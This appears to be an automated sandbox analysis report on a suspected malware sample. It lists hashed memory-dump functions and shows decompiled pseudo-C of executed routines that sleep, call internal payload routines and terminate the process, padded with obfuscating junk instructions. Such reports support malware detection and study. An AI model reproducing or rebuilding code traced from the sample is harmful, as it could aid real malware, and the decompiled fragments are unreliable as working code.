                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                                                                                                                                    • String ID: -
                                                                                                                                    • API String ID: 2232461714-2547889144
                                                                                                                                    • Opcode ID: a09f3882343501fc87aa882e247176d352320efe4973b34f750a6641363afb4b
                                                                                                                                    • Instruction ID: d94c93211653af6ad1c0d63212757aa7c1d368f430ca51bdc707b28decfb7cbb
                                                                                                                                    • Opcode Fuzzy Hash: a09f3882343501fc87aa882e247176d352320efe4973b34f750a6641363afb4b
                                                                                                                                    • Instruction Fuzzy Hash: 6DA19CB0E012288BDB64CF54DC49BEEB7B0EF88304F5481DAE4096B291D7789E80CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 909868375-0
                                                                                                                                    • Opcode ID: ac3e3550c8b668a757f22858f4e93fda89a087faab499d5db515f639689e816b
                                                                                                                                    • Instruction ID: a17dae7330ecac01f43e0f07e466e5584ba4d3cf81f710ca55e0e3f2b187316c
                                                                                                                                    • Opcode Fuzzy Hash: ac3e3550c8b668a757f22858f4e93fda89a087faab499d5db515f639689e816b
                                                                                                                                    • Instruction Fuzzy Hash: 8CA18FB1E00228DFDB24DF54DC81BEEB7B4BB48304F54819AE50967281D738AE84CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BytesCheck$HeapPointerValid__errno__free_base_memset
                                                                                                                                    • String ID: tDj
                                                                                                                                    • API String ID: 2211402958-2513116121
                                                                                                                                    • Opcode ID: 7f1a9ee6f74770888807261217c2b5e60a315f231e168795c0b9dc81bfec780d
                                                                                                                                    • Instruction ID: c30059b7c6e2902b61a0aac9ea4fbc757bf5df0b3050e10b41d1cc0740d3e125
                                                                                                                                    • Opcode Fuzzy Hash: 7f1a9ee6f74770888807261217c2b5e60a315f231e168795c0b9dc81bfec780d
                                                                                                                                    • Instruction Fuzzy Hash: F691A370B40204BBDB24DB54DD82FAA73A5EB48704F304159F604AB3D2D279EE81DB9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno$Message___crt__invoke_watson_if_error__snwprintf_s_raise_wcscpy_s
                                                                                                                                    • String ID: -G@
                                                                                                                                    • API String ID: 2907285194-103847155
                                                                                                                                    • Opcode ID: 11095026a0f4ddbeaf2e4af44874a4c7565b3e510116494cf642a0335749c930
                                                                                                                                    • Instruction ID: 31bbad08808502f9c117a0f46d362f5607bd28bd97c523a95b531ee8eb9d5839
                                                                                                                                    • Opcode Fuzzy Hash: 11095026a0f4ddbeaf2e4af44874a4c7565b3e510116494cf642a0335749c930
                                                                                                                                    • Instruction Fuzzy Hash: 683184B5F40214BBDB24EA91DC42FDA73B5AB4C704F0041AAF309762C6D6785AC18F99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno_memset$__invalid_parameter
                                                                                                                                    • String ID: P
                                                                                                                                    • API String ID: 2239222518-3110715001
                                                                                                                                    • Opcode ID: 40f9928747d2af79493494889962d63e740aabbb0e512ce6726ff1120d10e0fa
                                                                                                                                    • Instruction ID: dd27e8535942e38fdb3dabfe661de93b13ed25f46f5b2cb79041b53ff4ae2dd7
                                                                                                                                    • Opcode Fuzzy Hash: 40f9928747d2af79493494889962d63e740aabbb0e512ce6726ff1120d10e0fa
                                                                                                                                    • Instruction Fuzzy Hash: 20418B70E01219EBCF14CF68D8457AE7771FB44318F10866EE8255A3D0CB799A66CF89
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: '$0$9
                                                                                                                                    • API String ID: 3120068967-269856862
                                                                                                                                    • Opcode ID: bf48d2c01b623cf97400a2c4d0244ca3e7eb7da97ac3bcaf6a95d241c01778cd
                                                                                                                                    • Instruction ID: 0318e8824cf5846596fa02da276e0eddbc6af985e5cad254189ed087eed37cc3
                                                                                                                                    • Opcode Fuzzy Hash: bf48d2c01b623cf97400a2c4d0244ca3e7eb7da97ac3bcaf6a95d241c01778cd
                                                                                                                                    • Instruction Fuzzy Hash: 8141F271A05628DFDB24CF48D889BAEB7B5FF44308F5485DAD448AB241C3389A81CF85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 0$9
                                                                                                                                    • API String ID: 3120068967-1975997740
                                                                                                                                    • Opcode ID: 9fe8673b4a284eb21c839c761d7e88681c39cde252b3e4cc70ed3de5c1e82d58
                                                                                                                                    • Instruction ID: 16738c2f4a422dd06d35f6726b99fb3cff60d2a3279301d0e5e36f1977d06f39
                                                                                                                                    • Opcode Fuzzy Hash: 9fe8673b4a284eb21c839c761d7e88681c39cde252b3e4cc70ed3de5c1e82d58
                                                                                                                                    • Instruction Fuzzy Hash: 3F41F371E05628DFDB24CF48D889BAEB7B5FF44308F5485DAD449AB241C7389A81CF85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: '$9
                                                                                                                                    • API String ID: 3120068967-1823400153
                                                                                                                                    • Opcode ID: e11ab51c2aaa91dc6f8c19ef18e750b7549c90fefb811f6d7ac18edb45747821
                                                                                                                                    • Instruction ID: 42e04d133b476b6c5a5d8866b508e4918b34cfa494087ed0080723c1b0ac767c
                                                                                                                                    • Opcode Fuzzy Hash: e11ab51c2aaa91dc6f8c19ef18e750b7549c90fefb811f6d7ac18edb45747821
                                                                                                                                    • Instruction Fuzzy Hash: 054107B1E001299FDB24CF48DD81BAEB7B5FF85314F50419AD148A7241D7789E81CF5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3120068967-2366072709
                                                                                                                                    • Opcode ID: fdb9d56939ac48b5148c6c4f2f08352fd1376580d8f2440f1ab04a6e4ff6ea25
                                                                                                                                    • Instruction ID: 15d0bff0f62f50fc9c28439a7dddf85826658908c1f18501516e461e9f2ee2c2
                                                                                                                                    • Opcode Fuzzy Hash: fdb9d56939ac48b5148c6c4f2f08352fd1376580d8f2440f1ab04a6e4ff6ea25
                                                                                                                                    • Instruction Fuzzy Hash: D24106B1E001299FDB24CF48DD81BAEB7B5FF85314F50819AE148AB241D7789E81CF5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3120068967-2366072709
                                                                                                                                    • Opcode ID: 13f1a8206349fbcec969dfabc4bbbdf2762ca3a938afa60d90cef2e6a1d395bf
                                                                                                                                    • Instruction ID: 9fbc2bf35925de02b80fba557a5d46b3bdba5b4343a508a54cca52ee3735b3d5
                                                                                                                                    • Opcode Fuzzy Hash: 13f1a8206349fbcec969dfabc4bbbdf2762ca3a938afa60d90cef2e6a1d395bf
                                                                                                                                    • Instruction Fuzzy Hash: 8341F5B1E001299FDB24CF48DD81BAEB7B5FF85314F5081AAE149AB241D7389E81CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3120068967-2366072709
                                                                                                                                    • Opcode ID: a6b35121f21e9ebbb4f6ad9c6350a5e16c114db55709e161e90f67dae19db428
                                                                                                                                    • Instruction ID: 9058bd5233e54abace17e047a7dd133df57be09558f825b6dc601d9be07e1e3b
                                                                                                                                    • Opcode Fuzzy Hash: a6b35121f21e9ebbb4f6ad9c6350a5e16c114db55709e161e90f67dae19db428
                                                                                                                                    • Instruction Fuzzy Hash: 3D41E371E01628DFEB24CF48D899BAEB7B5FF44304F54859AE449AB241D7389E81CF84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 2124759748-2366072709
                                                                                                                                    • Opcode ID: 65d42acc206d4093b8fcfc839c5c970e345671cb0e1463a3308c74bbed5768fa
                                                                                                                                    • Instruction ID: e41ff6c82e62816f30eb0318fcbef62b4b6b15778e89fd38867deca8ebe726aa
                                                                                                                                    • Opcode Fuzzy Hash: 65d42acc206d4093b8fcfc839c5c970e345671cb0e1463a3308c74bbed5768fa
                                                                                                                                    • Instruction Fuzzy Hash: 8641E4B1E001299FDB24CF48DD81BAEB7B5FB85314F5081EAE149A7241D7789A81CF1A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 2124759748-2366072709
                                                                                                                                    • Opcode ID: 8ba939bdaa6ce744a7502132470aaa8cc86510893d4d9d8f8ce2315b4b7611c2
                                                                                                                                    • Instruction ID: a3b53726d153f1bb5b0e9c0d1c15a4ecd95bf20a68dad5363ac1304bfad30759
                                                                                                                                    • Opcode Fuzzy Hash: 8ba939bdaa6ce744a7502132470aaa8cc86510893d4d9d8f8ce2315b4b7611c2
                                                                                                                                    • Instruction Fuzzy Hash: 7A41E471A05628DFDB24CF48E889BAEB7B5FF44304F6085DAE449AB241D7389E81CF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __initterm.LIBCMTD ref: 00419EEA
                                                                                                                                    • __initterm.LIBCMTD ref: 00419EFC
                                                                                                                                    • __CrtSetDbgFlag.LIBCMTD ref: 00419F0F
                                                                                                                                    • ___freeCrtMemory.LIBCMTD ref: 00419F26
                                                                                                                                      • Part of subcall function 00418F80: RtlEncodePointer.NTDLL(00000000,?,00420FFE), ref: 00418F87
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __initterm$EncodeFlagMemoryPointer___free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2654307729-0
                                                                                                                                    • Opcode ID: 9ffeb9a6a16c8145eefb2377892b528700be8179186667c83366b5b4f5f7deac
                                                                                                                                    • Instruction ID: 58f54717aa19c88f19e8dabc8049376e9058faeea90454d47aeeb719af1ecf13
                                                                                                                                    • Opcode Fuzzy Hash: 9ffeb9a6a16c8145eefb2377892b528700be8179186667c83366b5b4f5f7deac
                                                                                                                                    • Instruction Fuzzy Hash: 84411675E05209DBCB04DFA4D994AEEBBB1FB48314F24466AE411B3390D7396881CF69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset
                                                                                                                                    • String ID: R"L$t!h<!@
                                                                                                                                    • API String ID: 2102423945-1202547949
                                                                                                                                    • Opcode ID: e79208c7b8eb3658cad8c565fc1a637447da32a738feacc3f588254750d92c15
                                                                                                                                    • Instruction ID: ea58af0800961419a8fb65ecb3375f5d08f57ed4dc3e3f13d8063ca7b2a1770b
                                                                                                                                    • Opcode Fuzzy Hash: e79208c7b8eb3658cad8c565fc1a637447da32a738feacc3f588254750d92c15
                                                                                                                                    • Instruction Fuzzy Hash: 38215175A00104EFCB14CF54DA81AAA77B2FB89308F30C19AE4055B395D739EE42DF99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno__invalid_parameter
                                                                                                                                    • String ID: u.
                                                                                                                                    • API String ID: 3025725278-3285101172
                                                                                                                                    • Opcode ID: 792911f5d30bace1ddb4cffdbd48c733af9fb67f862e9f575490635da76451c6
                                                                                                                                    • Instruction ID: 1a37532de20245b4f670c5593df2ff5077b23805f1e3e1b16de38e10507daad3
                                                                                                                                    • Opcode Fuzzy Hash: 792911f5d30bace1ddb4cffdbd48c733af9fb67f862e9f575490635da76451c6
                                                                                                                                    • Instruction Fuzzy Hash: 70F0E5F1BD03086AF6206A449D47F997210E749B14F30047BF109756C295FE244201AE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                    			E00401824(char __eax, void* __ecx, void* __edi, void* __eflags) {
                                                                                                                                    				intOrPtr* _t8;
                                                                                                                                    				intOrPtr _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t19;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t22;
                                                                                                                                    				signed char* _t24;
                                                                                                                                    				void* _t26;
                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                    
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				_t19 = __ecx;
                                                                                                                                    				_t8 = __eax;
                                                                                                                                    				asm("aam 0xa6");
                                                                                                                                    				asm("outsb");
                                                                                                                                    				asm("xlatb");
                                                                                                                                    				 *0xd47b7c13 = __eax;
                                                                                                                                    				_pop(_t24);
                                                                                                                                    				asm("out dx, eax");
                                                                                                                                    				if(__eflags != 0) {
                                                                                                                                    					asm("arpl [eax], ax");
                                                                                                                                    					goto L6;
                                                                                                                                    				} else {
                                                                                                                                    					if(__eflags < 0) {
                                                                                                                                    						L6:
                                                                                                                                    						 *_t8 =  *_t8 + _t8;
                                                                                                                                    						__eflags =  *_t8;
                                                                                                                                    						goto L7;
                                                                                                                                    					} else {
                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                    							L7:
                                                                                                                                    							L004011BF(_t8, _t22, _t24, _t26, __eflags);
                                                                                                                                    							_t17 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                    							Sleep(0x1388);
                                                                                                                                    							_t11 = E004013F1(_t17, _t21, _t22, _t24, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
                                                                                                                                    							__eflags = _t11;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								_push( *((intOrPtr*)(_t26 + 0x14)));
                                                                                                                                    								_push( *((intOrPtr*)(_t26 - 4)));
                                                                                                                                    								_push(_t11);
                                                                                                                                    								_push(_t17); // executed
                                                                                                                                    								E004014CF(_t11, _t17, _t19, _t21, _t22, _t24); // executed
                                                                                                                                    							}
                                                                                                                                    							 *_t17(0xffffffff, 0); // executed
                                                                                                                                    							_push(0x18bd);
                                                                                                                                    							_t13 =  *_t28;
                                                                                                                                    							return L004011BF(_t13, _t22, _t24, _t26, __eflags);
                                                                                                                                    						} else {
                                                                                                                                    							asm("aam 0x5e");
                                                                                                                                    							asm("fstp8 st4");
                                                                                                                                    							 *_t24 =  *_t24 << 0x43;
                                                                                                                                    							return 0x2b2b2bb3;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}













                                                                                                                                    0x00401824
                                                                                                                                    0x00401824
                                                                                                                                    0x00401824
                                                                                                                                    0x00401824
                                                                                                                                    0x00401826
                                                                                                                                    0x00401827
                                                                                                                                    0x00401828
                                                                                                                                    0x0040182d
                                                                                                                                    0x0040182e
                                                                                                                                    0x0040182f
                                                                                                                                    0x004018ad
                                                                                                                                    0x00000000
                                                                                                                                    0x00401831
                                                                                                                                    0x00401831
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x00000000
                                                                                                                                    0x00401833
                                                                                                                                    0x00401833
                                                                                                                                    0x004018b1
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924
                                                                                                                                    0x00401835
                                                                                                                                    0x00401835
                                                                                                                                    0x00401837
                                                                                                                                    0x0040183e
                                                                                                                                    0x00401841
                                                                                                                                    0x00401841
                                                                                                                                    0x00401833
                                                                                                                                    0x00401831

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480899227.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: ad0f507ef67832261bf38ed725b204dfee6e0c30d2326636109802664b6aa668
                                                                                                                                    • Instruction ID: 42a07c3f6415b396ffd19e14411fed7baa37742ddc7d1671b3566718c03b9097
                                                                                                                                    • Opcode Fuzzy Hash: ad0f507ef67832261bf38ed725b204dfee6e0c30d2326636109802664b6aa668
                                                                                                                                    • Instruction Fuzzy Hash: EA01F533604245EBEB016BD48C91E993726AB41354F20467BB642B91F1DA3D8B12A36B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E00401888(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v8;
                                                                                                                                    				intOrPtr _v119;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				intOrPtr* _t10;
                                                                                                                                    				void* _t13;
                                                                                                                                    				intOrPtr _t15;
                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                    				void* _t24;
                                                                                                                                    				void* _t26;
                                                                                                                                    				void* _t29;
                                                                                                                                    				void* _t31;
                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                    				intOrPtr _t36;
                                                                                                                                    
                                                                                                                                    				_t23 = __edx;
                                                                                                                                    				_v119 = _v119 + __edx;
                                                                                                                                    				_t29 = _t31;
                                                                                                                                    				_t32 = _t31 - 4;
                                                                                                                                    				_push(_t26);
                                                                                                                                    				_push(_t24);
                                                                                                                                    				_t10 = 0x18bd;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *_t10 =  *_t10 + _t10;
                                                                                                                                    				_t36 =  *_t10;
                                                                                                                                    				L004011BF(_t10, _t24, _t26, _t29, _t36);
                                                                                                                                    				_t19 = _a4;
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t13 = E004013F1(_t19, _t23, _t24, _t26, _t19, _a8, _a12,  &_v8); // executed
                                                                                                                                    				_t37 = _t13;
                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                    					_push(_a16);
                                                                                                                                    					_push(_v8);
                                                                                                                                    					_push(_t13);
                                                                                                                                    					_push(_t19); // executed
                                                                                                                                    					E004014CF(_t13, _t19, 0x63, _t23, _t24, _t26); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t19(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t15 =  *_t32;
                                                                                                                                    				return L004011BF(_t15, _t24, _t26, _t29, _t37);
                                                                                                                                    			}


















                                                                                                                                    0x00401888
                                                                                                                                    0x00401888
                                                                                                                                    0x0040188a
                                                                                                                                    0x0040188c
                                                                                                                                    0x00401890
                                                                                                                                    0x00401891
                                                                                                                                    0x0040189f
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480899227.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 95b0f5ed6a0d16b85923b128117261f154bb39d95e5065dc622c728017946ed0
                                                                                                                                    • Instruction ID: 06ad8fc468d3cb0de258debb5d73388aacedaf873ec4a87ac4e9841071b9307a
                                                                                                                                    • Opcode Fuzzy Hash: 95b0f5ed6a0d16b85923b128117261f154bb39d95e5065dc622c728017946ed0
                                                                                                                                    • Instruction Fuzzy Hash: 0C01D476608208EBEB016A908CD0DA937269F45314F308237F613782F1C67D8713B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E00401889(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v8;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				intOrPtr* _t8;
                                                                                                                                    				void* _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t16;
                                                                                                                                    				void* _t19;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t22;
                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                    				intOrPtr _t25;
                                                                                                                                    
                                                                                                                                    				_t8 = 0x18bd;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *_t8 =  *_t8 + _t8;
                                                                                                                                    				_t25 =  *_t8;
                                                                                                                                    				L004011BF(_t8, _t20, _t21, _t22, _t25);
                                                                                                                                    				_t16 = _a4;
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t11 = E004013F1(_t16, _t19, _t20, _t21, _t16, _a8, _a12,  &_v8); // executed
                                                                                                                                    				_t26 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					_push(_a16);
                                                                                                                                    					_push(_v8);
                                                                                                                                    					_push(_t11);
                                                                                                                                    					_push(_t16); // executed
                                                                                                                                    					E004014CF(_t11, _t16, 0x63, _t19, _t20, _t21); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t16(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t13 =  *_t23;
                                                                                                                                    				return L004011BF(_t13, _t20, _t21, _t22, _t26);
                                                                                                                                    			}


















                                                                                                                                    0x0040189f
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480899227.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 6d648cfe7043a349c0fb33ab0f60cd294c66010c56e2b7b12933d6fe6f57d3f1
                                                                                                                                    • Instruction ID: 8f35bf8a169b0738e0b1c43a95160d6084873621cdc7210903a112d1efbcbce3
                                                                                                                                    • Opcode Fuzzy Hash: 6d648cfe7043a349c0fb33ab0f60cd294c66010c56e2b7b12933d6fe6f57d3f1
                                                                                                                                    • Instruction Fuzzy Hash: 34018476608208FBEB017A958C91DAA36299F45314F208237BA13791F1D67D8B12B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                    			E004018A2(void* __edi, void* __esi) {
                                                                                                                                    				intOrPtr* _t8;
                                                                                                                                    				void* _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t26;
                                                                                                                                    				void* _t28;
                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                    				intOrPtr _t32;
                                                                                                                                    
                                                                                                                                    				_t24 = __esi;
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                    				_t8 = 0x18bd;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *_t8 =  *_t8 + _t8;
                                                                                                                                    				_t32 =  *_t8;
                                                                                                                                    				L004011BF(_t8, __edi, __esi, _t26, _t32);
                                                                                                                                    				_t17 =  *((intOrPtr*)(_t26 + 8));
